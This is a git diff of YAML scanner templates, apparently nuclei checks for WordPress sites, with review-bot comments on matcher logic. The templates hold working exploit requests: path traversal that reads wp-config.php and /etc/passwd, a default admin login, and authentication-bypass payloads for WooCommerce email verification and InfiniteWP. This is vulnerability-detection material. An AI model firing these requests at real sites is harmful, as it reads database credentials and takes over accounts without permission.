@@ -1,26 +0,0 @@ -id: nativechurch-wp-theme-lfd - -info: - name: WordPress NativeChurch Theme - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system. - reference: - - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html - tags: wordpress,wp-theme,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - - "DB_HOST" - - "The base configurations of the WordPress" - part: body - condition: and diff --git a/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml b/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml index b0e5093a12..5ce4bfe007 100644 --- a/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml +++ b/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml @@ -4,16 +4,12 @@ info: name: WordPress NativeChurch Theme - Local File Inclusion author: 0x_Akoko severity: high - description: | - WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file. + description: WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file. reference: - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html - - https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1 - metadata: - max-request: 1 - tags: wp-theme,lfi,wp,packetstorm,wpscan,wordpress + tags: wordpress,wp-theme,lfi -http: +requests: - method: GET path: - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php' 
@@ -21,12 +17,12 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_HOST" - "The base configurations of the WordPress" + part: body condition: and -# digest: 4b0a00483046022100c6f65699021d81e0f72c6de7cc9196286f921143395769007b138c4f55a76c8e022100b5f3e2ee8c6be8e43d5b9c376435dd16f20c09a2dc755adf4d3ee7154432fff1:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/trilithic-viewpoint-default-10835.yaml b/poc/wordpress/trilithic-viewpoint-default-10835.yaml deleted file mode 100644 index d26dd6f456..0000000000 --- a/poc/wordpress/trilithic-viewpoint-default-10835.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: trilithic-viewpoint-default - -info: - name: Trilithic Viewpoint Default Login - author: davidmckennirey - severity: high - description: | - Searches for default admin credentials for the (discontinued) Trilithic Viewpoint application. - tags: default-login,trilithic,viewpoint - -requests: - - raw: - - | - POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Cookie: trilithic_win_auth=false - - {u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false} - - payloads: - username: - - admin - password: - - trilithic - attack: pitchfork - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"authorized":true' - - 'redirectUrl' - part: body - condition: and \ No newline at end of file diff --git a/poc/wordpress/viewpoint-system-status-11018.yaml b/poc/wordpress/viewpoint-system-status-11018.yaml index 7d0e87a274..30764c6e96 100644 --- a/poc/wordpress/viewpoint-system-status-11018.yaml +++ b/poc/wordpress/viewpoint-system-status-11018.yaml 
@@ -1,24 +1,20 @@ id: viewpoint-system-status - info: name: ViewPoint System Status author: dhiyaneshDK severity: low - metadata: - shodan-query: http.title:"ViewPoint System Status" + reference: + - https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 tags: status,exposures,viewpoint - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - 'ViewPoint System Status' - - type: status status: - 200 diff --git a/poc/wordpress/viewpoint-system-status-11019.yaml b/poc/wordpress/viewpoint-system-status-11019.yaml deleted file mode 100644 index 93bf466527..0000000000 --- a/poc/wordpress/viewpoint-system-status-11019.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: viewpoint-system-status -info: - name: ViewPoint System Status - author: dhiyaneshDK - severity: low - metadata: - shodan-query: http.title:"ViewPoint System Status" - tags: status,exposures,viewpoint -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - words: - - 'ViewPoint System Status' - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-LFI.yaml b/poc/wordpress/wordpress-LFI.yaml index f4bde03529..aea478a3f7 100644 --- a/poc/wordpress/wordpress-LFI.yaml +++ b/poc/wordpress/wordpress-LFI.yaml @@ -1,10 +1,8 @@ id: wordpress-LFI - info: name: wordpress-LFI author: 0x240x23elu severity: High - requests: - method: GET path: @@ -16,10 +14,8 @@ requests: - "{{BaseURL}}/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" - - matchers: - type: regex regex: - "root:[x*]:0:0:" - part: body \ No newline at end of file + part: body 
diff --git a/poc/wordpress/wordpress-accessible-wpconfig-11235.yaml b/poc/wordpress/wordpress-accessible-wpconfig-11235.yaml deleted file mode 100644 index 4419af6656..0000000000 --- a/poc/wordpress/wordpress-accessible-wpconfig-11235.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: wordpress-accessible-wpconfig -info: - name: WordPress accessible wp-config - author: Kiblyn11 & zomsop82 & madrobot & geeknik & daffainfo - severity: high - tags: wordpress,backups -requests: - - method: GET - path: - - '{{BaseURL}}/wp-config.php' - - '{{BaseURL}}/.wp-config.php.swp' - - '{{BaseURL}}/wp-config-sample.php' - - '{{BaseURL}}/wp-config.inc' - - '{{BaseURL}}/wp-config.old' - - '{{BaseURL}}/wp-config.txt' - - '{{BaseURL}}/wp-config.php.txt' - - '{{BaseURL}}/wp-config.php.bak' - - '{{BaseURL}}/wp-config.php.old' - - '{{BaseURL}}/wp-config.php.dist' - - '{{BaseURL}}/wp-config.php.inc' - - '{{BaseURL}}/wp-config.php.swp' - - '{{BaseURL}}/wp-config.php.html' - - '{{BaseURL}}/wp-config-backup.txt' - - '{{BaseURL}}/wp-config.php.save' - - '{{BaseURL}}/wp-config.php~' - - '{{BaseURL}}/wp-config.php.orig' - - '{{BaseURL}}/wp-config.php.original' - - '{{BaseURL}}/_wpeprivate/config.json' - matchers-condition: and - matchers: - - type: word - words: - - DB_NAME - - WPENGINE_ACCOUNT - part: body - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml b/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml index c6cdd244de..f7c496190b 100644 --- a/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml +++ b/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml 
@@ -1,9 +1,10 @@ id: wordpress-accessible-wpconfig info: name: WordPress accessible wp-config - author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo + author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n severity: high - tags: wordpress,backups + description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading. + tags: wordpress,backup requests: - method: GET path: @@ -23,16 +24,19 @@ requests: - '{{BaseURL}}/wp-config-backup.txt' - '{{BaseURL}}/wp-config.php.save' - '{{BaseURL}}/wp-config.php~' + - '{{BaseURL}}/wp-config.php-backup' - '{{BaseURL}}/wp-config.php.orig' - '{{BaseURL}}/wp-config.php.original' - '{{BaseURL}}/_wpeprivate/config.json' + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - - DB_NAME - - WPENGINE_ACCOUNT + - "DB_NAME" + - "DB_PASSWORD" part: body + condition: and - type: status status: - 200 diff --git a/poc/wordpress/wordpress-affiliatewp-log-11240.yaml b/poc/wordpress/wordpress-affiliatewp-log-11240.yaml deleted file mode 100644 index 6c7366d644..0000000000 --- a/poc/wordpress/wordpress-affiliatewp-log-11240.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wordpress-affiliatewp-log -info: - name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure - author: dhiyaneshDK - severity: low - tags: wordpress,log,plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' - matchers-condition: and - matchers: - - type: word - words: - - 'Referral could not be retrieved' - - 'Affiliate CSV' - - type: word - words: - - 'text/plain' - part: header - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-affiliatewp-log-11242.yaml b/poc/wordpress/wordpress-affiliatewp-log-11242.yaml new file mode 100644 index 0000000000..ecacdbc600 --- /dev/null +++ b/poc/wordpress/wordpress-affiliatewp-log-11242.yaml 
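Review bot: The matcher change in the second hunk now requires both `DB_NAME` and `DB_PASSWORD`, but the path list still ends with `{{BaseURL}}/_wpeprivate/config.json`, which the removed `WPENGINE_ACCOUNT` word appears to have been there to catch. If that JSON file does not contain both database constants, an exposed WP Engine config is silently no longer reported. Either move that path into its own request entry with a `WPENGINE_ACCOUNT` word matcher or drop it from the list, so the template does not claim coverage it lacks. The `path:` list begins above the second hunk, so its earlier entries are not visible here.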
@@ -0,0 +1,23 @@ +id: wordpress-affiliatewp-log +info: + name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure + author: dhiyaneshDK + severity: low + tags: wordpress,log,plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' + matchers-condition: and + matchers: + - type: word + words: + - 'Referral could not be retrieved' + - 'Affiliate CSV' + - type: word + words: + - 'text/plain' + part: header + - type: status + status: + - 200 diff --git a/poc/wordpress/wordpress-affiliatewp-log.yaml b/poc/wordpress/wordpress-affiliatewp-log.yaml index ecacdbc600..198fea56a0 100644 --- a/poc/wordpress/wordpress-affiliatewp-log.yaml +++ b/poc/wordpress/wordpress-affiliatewp-log.yaml @@ -1,23 +1,32 @@ id: wordpress-affiliatewp-log + info: name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure author: dhiyaneshDK severity: low + metadata: + max-request: 1 tags: wordpress,log,plugin -requests: + +http: - method: GET path: - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' + matchers-condition: and matchers: - type: word words: - 'Referral could not be retrieved' - 'Affiliate CSV' + - type: word words: - 'text/plain' part: header + - type: status status: - 200 + +# digest: 4a0a00473045022011ac29125549f3934e82e0a00962160e2d29f294113cd751c599745530d9f526022100bcdc1d72d1dde78dfbbc184a40a33d9ff8a126f8b9971395c576afc0f9ca855c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml b/poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml index a392e5f104..4f8b9df7f6 100644 --- a/poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml +++ b/poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml 
@@ -4,8 +4,7 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the bbpress wordpress plugin. - reference: - - https://www.exploit-db.com/ghdb/6158 + reference: https://www.exploit-db.com/ghdb/6158 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wordpress-bbpress-plugin-listing.yaml b/poc/wordpress/wordpress-bbpress-plugin-listing.yaml new file mode 100644 index 0000000000..a392e5f104 --- /dev/null +++ b/poc/wordpress/wordpress-bbpress-plugin-listing.yaml @@ -0,0 +1,23 @@ +id: wordpress-bbpress-plugin-listing +info: + name: WordPress bbPress Plugin Directory Listing + author: dhiyaneshDK + severity: info + description: Searches for sensitive directories present in the bbpress wordpress plugin. + reference: + - https://www.exploit-db.com/ghdb/6158 + tags: wordpress,listing,plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/bbpress/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/bbpress/" + condition: and + - type: status + status: + - 200 diff --git a/poc/wordpress/wordpress-db-repair-11252.yaml b/poc/wordpress/wordpress-db-repair-11252.yaml new file mode 100644 index 0000000000..bdf47722c3 --- /dev/null +++ b/poc/wordpress/wordpress-db-repair-11252.yaml 
@@ -0,0 +1,35 @@ +id: wordpress-db-repair + +info: + name: Wordpress DB Repair Exposed + author: _C0wb0y_ + severity: low + description: Discover enabled Wordpress repair page. + metadata: + max-request: 1 + tags: wordpress,config,fpd + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/maint/repair.php" + + matchers-condition: and + matchers: + - type: word + words: + - "WordPress" + + - type: status + status: + - 200 + + - type: word + words: + - "define" + - "WP_ALLOW_REPAIR" + - "true" + condition: and + negative: true + +# digest: 490a00463044022048d52e9a4f94a9d08c7365eca151825c702b06a113a6578821bb2b4f8ee6c7b60220509b242a3221080dd28182942490019a961481aac6c8cd8352263b8562d5b356:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-debug-log-11258.yaml b/poc/wordpress/wordpress-debug-log-11259.yaml similarity index 100% rename from poc/wordpress/wordpress-debug-log-11258.yaml rename to poc/wordpress/wordpress-debug-log-11259.yaml diff --git a/poc/wordpress/wordpress-detect-11261.yaml b/poc/wordpress/wordpress-detect-11260.yaml similarity index 100% rename from poc/wordpress/wordpress-detect-11261.yaml rename to poc/wordpress/wordpress-detect-11260.yaml diff --git a/poc/wordpress/wordpress-detect.yaml b/poc/wordpress/wordpress-detect.yaml index bf419a8314..1bb03114d3 100644 --- a/poc/wordpress/wordpress-detect.yaml +++ b/poc/wordpress/wordpress-detect.yaml 
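Review bot: The only positive body check in wordpress-db-repair-11252.yaml is the word `WordPress`, so any 200 response that mentions WordPress and lacks the `define` / `WP_ALLOW_REPAIR` / `true` hint is reported as an exposed repair page. A site that answers unknown admin paths with a 200 login or error page would match. Add a string that only the enabled repair screen prints to the first word matcher, for example `- "Repair Database"` with `condition: and`. That is the button label in current WordPress as far as I know, so confirm it against the versions in scope.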
@@ -1,65 +1,34 @@ id: wordpress-detect - info: - name: WordPress Detect - author: pdteam,daffainfo,ricardomaia,topscoder,AdamCrosser + name: WordPress Detection + author: pdteam severity: info metadata: - verified: true - max-request: 4 - vendor: wordpress - product: wordpress shodan-query: http.component:"WordPress" - category: cms - tags: tech,wordpress,cms,wp - -http: + tags: tech,wordpress +requests: - method: GET path: - "{{BaseURL}}" - - "{{BaseURL}}/wp-admin/install.php" - - "{{BaseURL}}/feed/" - - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked - redirects: true max-redirects: 2 - stop-at-first-match: true - - matchers-condition: and + matchers-condition: or matchers: - type: regex regex: - - '<generator>https?:\/\/wordpress\.org.*</generator>' - - 'wp-login.php' - - '\/wp-content/themes\/' - - '\/wp-includes\/' - - 'name="generator" content="wordpress' - '<link[^>]+s\d+\.wp\.com' - '<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -' - '<!--[^>]+WP-Super-Cache' condition: or - - - type: status - status: - - 200 - + - type: word + words: + - '/wp-content/themes/' + - '/wp-includes/' + - 'name="generator" content="wordpress' + - '<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/' + condition: or extractors: - type: regex - name: version_by_generator - group: 1 - regex: - - '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)' - - - type: regex - name: version_by_js - group: 1 - regex: - - 'wp-emoji-release\.min\.js\?ver=((\d+\.?)+)\b' - - - type: regex - name: version_by_css group: 1 regex: - - 'install\.min\.css\?ver=((\d+\.?)+)\b' - -# digest: 4a0a00473045022063a1eb3686edc8dfada91893ca54db0bb002e131cca2a373d56b39c69e46b5440221009004f9bb9c3168e5bdacea0aed03100ce640ecaa2afb4bb3b64a3e545ef1fbcb:922c64590222798bb761d5b6d8e72950 + - 'content="WordPress ([0-9.]+)"' 
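Review bot: The new side of wordpress-detect.yaml keeps `max-redirects: 2` but drops `redirects: true`, so unless redirects are enabled globally for the run the limit has nothing to act on. A site that answers `{{BaseURL}}` with a redirect to its canonical host is then judged on the redirect response alone; restore `redirects: true` above `max-redirects: 2`. The added word matcher also lists lower-case strings (`name="generator" content="wordpress` and the W3 Total Cache comment), while the extractor in the same hunk expects `content="WordPress`. Word matching is case-sensitive by default, so add `case-insensitive: true` to that matcher.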
diff --git a/poc/wordpress/wordpress-directory-listing-11266.yaml b/poc/wordpress/wordpress-directory-listing-11266.yaml index fd0ec7d30e..0e719cc724 100644 --- a/poc/wordpress/wordpress-directory-listing-11266.yaml +++ b/poc/wordpress/wordpress-directory-listing-11266.yaml @@ -1,25 +1,17 @@ id: wordpress-directory-listing - info: name: Wordpress directory listing author: Manas_Harsh severity: info - tags: wordpress - requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/" - - "{{BaseURL}}/wp-content/themes/" - - "{{BaseURL}}/wp-content/plugins/" - - "{{BaseURL}}/wp-includes/" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - - "Index of /" + - Index of /wp-content/uploads diff --git a/poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml b/poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml index a67ac9a187..a2d52041ec 100644 --- a/poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml +++ b/poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml 
@@ -1,25 +1,24 @@ id: wp-woocommerce-email-verification info: - name: wordpress-emails-verification-for-woocommerce - author: random-robbie + name: WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass + author: random_robbie severity: critical - tags: wordpress,wp-plugin - description: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass reference: https://wpvulndb.com/vulnerabilities/10318 - # GDPR plugin may give a false positive so double check headers + tags: wordpress,wp-plugin,woocommerce requests: - method: GET path: - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" + stop-at-first-match: true matchers-condition: and matchers: - - type: word - words: - - "wordpress_logged_in" + - type: regex part: header - - type: status - status: - - 401 - - 403 - negative: true + regex: + - "wordpress_logged_in_[a-z0-9]{32}" + - type: dsl + dsl: + - 'status_code != 401' + - 'status_code != 403' + condition: or diff --git a/poc/wordpress/wordpress-emergency-script-11272.yaml b/poc/wordpress/wordpress-emergency-script-11272.yaml deleted file mode 100644 index 40258b1a9d..0000000000 --- a/poc/wordpress/wordpress-emergency-script-11272.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wordpress-emergency-script -info: - name: WordPress Emergency Script - author: dwisiswant0 - severity: info - tags: wordpress - # Ref:- - # https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script -requests: - - method: GET - path: - - "{{BaseURL}}/emergency.php" - matchers-condition: and - matchers: - - type: word - words: - - "Your use of this script is at your sole risk" - - "WordPress Administrator" - - "Update Options" - condition: and - part: body - - type: status - status: - - 200 
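Review bot: The new `dsl` matcher in wordpress-emails-verification-for-woocommerce-11271.yaml joins `status_code != 401` and `status_code != 403` with `condition: or`, which is true for every status code, so the matcher filters nothing. The template therefore fires on the cookie regex alone. The removed matcher excluded both codes; to keep that meaning use `condition: and`. The new `name: WooCommerce < 1.8.2 - ...` also drops the plugin name (Email Verification for WooCommerce) that the removed `description` carried, so a finding reads as a WooCommerce core issue; keep the plugin name in `name` or restore the description.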
diff --git a/poc/wordpress/wordpress-emergency-script-11275.yaml b/poc/wordpress/wordpress-emergency-script-11275.yaml new file mode 100644 index 0000000000..3d2a37fc3d --- /dev/null +++ b/poc/wordpress/wordpress-emergency-script-11275.yaml @@ -0,0 +1,24 @@ +id: wordpress-emergency-script +info: + name: WordPress Emergency Script + author: dwisiswant0 + severity: info + tags: wordpress + # Ref:- + reference: https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script +requests: + - method: GET + path: + - "{{BaseURL}}/emergency.php" + matchers-condition: and + matchers: + - type: word + words: + - "Your use of this script is at your sole risk" + - "WordPress Administrator" + - "Update Options" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/wordpress/wordpress-emergency-script-11277.yaml b/poc/wordpress/wordpress-emergency-script-11277.yaml index 3d2a37fc3d..b575cc4a57 100644 --- a/poc/wordpress/wordpress-emergency-script-11277.yaml +++ b/poc/wordpress/wordpress-emergency-script-11277.yaml @@ -1,15 +1,17 @@ id: wordpress-emergency-script + info: name: WordPress Emergency Script author: dwisiswant0 severity: info tags: wordpress - # Ref:- reference: https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script + requests: - method: GET path: - "{{BaseURL}}/emergency.php" + matchers-condition: and matchers: - type: word @@ -21,4 +23,4 @@ requests: part: body - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/wordpress/wordpress-emergency-script.yaml b/poc/wordpress/wordpress-emergency-script.yaml index 4a91d84f3f..40258b1a9d 100644 --- a/poc/wordpress/wordpress-emergency-script.yaml +++ b/poc/wordpress/wordpress-emergency-script.yaml 
@@ -1,20 +1,15 @@ id: wordpress-emergency-script - info: name: WordPress Emergency Script author: dwisiswant0 severity: info - reference: - - https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script - metadata: - max-request: 1 tags: wordpress - -http: + # Ref:- + # https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script +requests: - method: GET path: - "{{BaseURL}}/emergency.php" - matchers-condition: and matchers: - type: word @@ -24,9 +19,6 @@ http: - "Update Options" condition: and part: body - - type: status status: - 200 - -# digest: 4b0a00483046022100823548ff856b338033f95061322ef1e6f3dca61c73c2c268b9d0fda60a190f5e022100b4e66e5dbb5334c8504b13fc514a3683072ac9f75b8a9374b6a5840b63fef336:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-git-config-11278.yaml b/poc/wordpress/wordpress-git-config-11278.yaml deleted file mode 100644 index 0ade76adee..0000000000 --- a/poc/wordpress/wordpress-git-config-11278.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: wordpress-git-config -info: - name: Wordpress Git Config - author: nerrorsec - severity: info - description: Searches for the pattern /.git/config inside themes and plugins folder. - reference: https://hackerone.com/reports/248693 - tags: config,git,exposure,wordpress,wp-plugin,wp-theme -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/.git/config" - - "{{BaseURL}}/wp-content/themes/.git/config" - matchers-condition: and - matchers: - - type: word - words: - - "[core]" - - type: dsl - dsl: - - "!contains(tolower(body), '<html')" - - "!contains(tolower(body), '<body')" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-git-config-11279.yaml b/poc/wordpress/wordpress-git-config-11279.yaml index 2e71493a93..0ade76adee 100644 --- a/poc/wordpress/wordpress-git-config-11279.yaml +++ b/poc/wordpress/wordpress-git-config-11279.yaml 
@@ -1,36 +1,26 @@ id: wordpress-git-config - info: name: Wordpress Git Config author: nerrorsec severity: info description: Searches for the pattern /.git/config inside themes and plugins folder. - reference: - - https://hackerone.com/reports/248693 - metadata: - max-request: 2 - tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme - -http: + reference: https://hackerone.com/reports/248693 + tags: config,git,exposure,wordpress,wp-plugin,wp-theme +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/.git/config" - "{{BaseURL}}/wp-content/themes/.git/config" - matchers-condition: and matchers: - type: word words: - "[core]" - - type: dsl dsl: - "!contains(tolower(body), '<html')" - "!contains(tolower(body), '<body')" condition: and - - type: status status: - 200 - -# digest: 490a0046304402200c85e6bde7f8fd5a418f6ae475ea3e43619b2c9bbdaa025a2ff0a3467f271cc802204e6427102c1fe622a829ec9df5831e46740d60b9bf8eec9d72ecd086068a28de:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-gotmls-detect-11280.yaml b/poc/wordpress/wordpress-gotmls-detect-11280.yaml deleted file mode 100644 index 08ee19a727..0000000000 --- a/poc/wordpress/wordpress-gotmls-detect-11280.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: wordpress-gotmls-detect - -info: - name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall - author: vsh00t - reference: https://www.exploit-db.com/exploits/50107 - severity: info - tags: wordpress,wp-plugin,gotmls - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini" - - matchers-condition: and - matchers: - - type: word - words: - - "gotmls" - part: header - - - type: status - status: - - 302 - - extractors: - - type: kval - part: header - kval: - - Location diff --git a/poc/wordpress/wordpress-gotmls-detect.yaml b/poc/wordpress/wordpress-gotmls-detect.yaml index 1dcdacb57e..bdb31dc526 100644 
--- a/poc/wordpress/wordpress-gotmls-detect.yaml +++ b/poc/wordpress/wordpress-gotmls-detect.yaml @@ -1,37 +1,23 @@ id: wordpress-gotmls-detect - info: name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall author: vsh00t reference: https://www.exploit-db.com/exploits/50107 severity: info tags: wordpress,wp-plugin,gotmls - requests: - - payloads: - Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt - attack: sniper - threads: 100 - - raw: - - | - GET /wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini HTTP/1.1 - Host: {{Subdomains}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept-Encoding: gzip, deflate - Accept: */* - + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini" matchers-condition: and matchers: - type: word words: - "gotmls" part: header - - type: status status: - 302 - extractors: - type: kval part: header diff --git a/poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml b/poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml similarity index 100% rename from poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml rename to poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml diff --git a/poc/wordpress/wordpress-gtranslate-plugin-listing.yaml b/poc/wordpress/wordpress-gtranslate-plugin-listing.yaml deleted file mode 100644 index 3af168a795..0000000000 --- a/poc/wordpress/wordpress-gtranslate-plugin-listing.yaml +++ /dev/null 
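Review bot: wordpress-gotmls-detect.yaml is labelled a detection at `severity: info`, yet the request on the new side carries a `file=../../…/Windows/win.ini` parameter and nothing in the file explains why. The matchers only look for a 302 whose headers contain `gotmls`, so the traversal string is presumably there to provoke the plugin's firewall redirect rather than to read a file. State that in a `description:` field, so operators and WAF reviewers who see this request in logs can tell it apart from a file-read attempt.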
@@ -1,22 +0,0 @@ -id: wordpress-gtranslate-plugin-listing -info: - name: WordPress gtranslate Plugin Directory Listing - author: dhiyaneshDK - severity: info - description: Searches for sensitive directories present in the gtranslate wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6160 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/gtranslate/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/gtranslate/" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml b/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml index c48d37c9e4..88121a97b7 100644 --- a/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml +++ b/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml 
@@ -1,40 +1,25 @@ id: wordpress-infinitewp-auth-bypass - info: name: WordPress InfiniteWP Client Authentication Bypass author: princechaddha severity: critical reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ tags: wordpress,auth-bypass,wp-plugin - requests: - raw: - | GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 - Connection: close - - | POST / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} - redirects: true - extractors: - type: regex name: username @@ -43,7 +28,6 @@ requests: part: body regex: - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' - - type: regex name: username internal: true @@ -51,19 +35,16 @@ requests: part: header regex: - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' - matchers-condition: and matchers: - type: word words: - "wordpress_logged_in" part: header - - type: word words: - "<IWPHEADER>" - part: body - type: status status: - - 200 \ No newline at end of file + - 200 
diff --git a/poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml b/poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml
deleted file mode 100644
index ee41aa1a81..0000000000
--- a/poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml
+++ /dev/null
